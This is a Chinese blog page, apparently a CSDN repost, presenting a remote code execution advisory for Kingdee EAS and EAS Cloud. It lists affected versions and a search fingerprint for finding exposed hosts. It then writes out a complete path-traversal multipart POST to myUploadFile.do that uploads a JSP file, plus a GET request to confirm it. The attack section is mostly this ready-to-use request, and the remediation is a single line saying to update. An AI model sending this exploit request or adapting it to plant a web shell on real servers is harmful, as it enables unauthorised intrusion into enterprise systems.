码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 金蝶EAS、EAS Cloud远程代码执行漏洞


    【漏洞概述】

    金蝶 EAS 及 EAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。

    【漏洞介绍】

    金蝶 EAS 及 EAS Cloud 存在远程代码执行漏洞

    【影响版本】

    金蝶 EAS 8.0,8.1,8.2,8.5
    金蝶 EAS Cloud 8.6私有云,8.6公有云,8.6.1,8.8

    【指纹】

    app=”Kingdee-EAS”

    【产品界面】

    图片

    【利用过程】
    Kingdee EAS EAS Cloud myUploadFile.do接口存在任意文件上传问题

    1. POST /easportal/xxx/%2e%2e/xxx/myUploadFile.do HTTP/1.1
    2. Host: 127.0.0.1
    3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
    4. Connection: close
    5. Accept: */*
    6. Accept-Language: en
    7. Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySq4lDnabv8CwHfvx
    8. Cookie: sl-session=sqPhC9MLJmWsiN7c9/P6tA==
    9. Accept-Encoding: gzip, deflate
    10. Content-Length: 210
    11. SL-CE-SUID: 47
    12. ------WebKitFormBoundarySq4lDnabv8CwHfvx
    13. Content-Disposition: form-data; name="myFile"; filename="/demo.jsp"
    14. Content-Type: text/html
    15. <%out.println("test123");%>
    16. ------WebKitFormBoundarySq4lDnabv8CwHfvx--

    【验证】

    1. GET /easportal/xxx/../demo.jsp HTTP/1.1
    2. Host: 127.0.0.1

    图片

    【修复建议】

    及时更新软件版本

    图片

                                                                 没看够~?欢迎关注!

  • 相关阅读:
    工控安全方案分析
    前端研习录(32)——JavaScript 基于定时器实现防抖、节流
    LeetCode 子串 子数组 系列题目总结
    202435读书笔记|《半小时漫画中国史》——读点经济学与历史,生活更美好,趣味烧脑土地制度、商鞅变法、华丽丽的丝绸之路这里都有
    Linux命令(120)之tcpdump
    Oracle Analytics BIEE 操作方法(六)数据格式1:百分比
    第十三天Tensorflow数据读取和复杂模型的构建
    C语言连接MySQL并执行SQL语句(hello world)
    pytorch线性代数的基本操作
    【睡服】自动化面试官,就用2022年最全的自动化测试面试题及答案
  • 原文地址:https://blog.csdn.net/hackzkaq/article/details/133812942
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号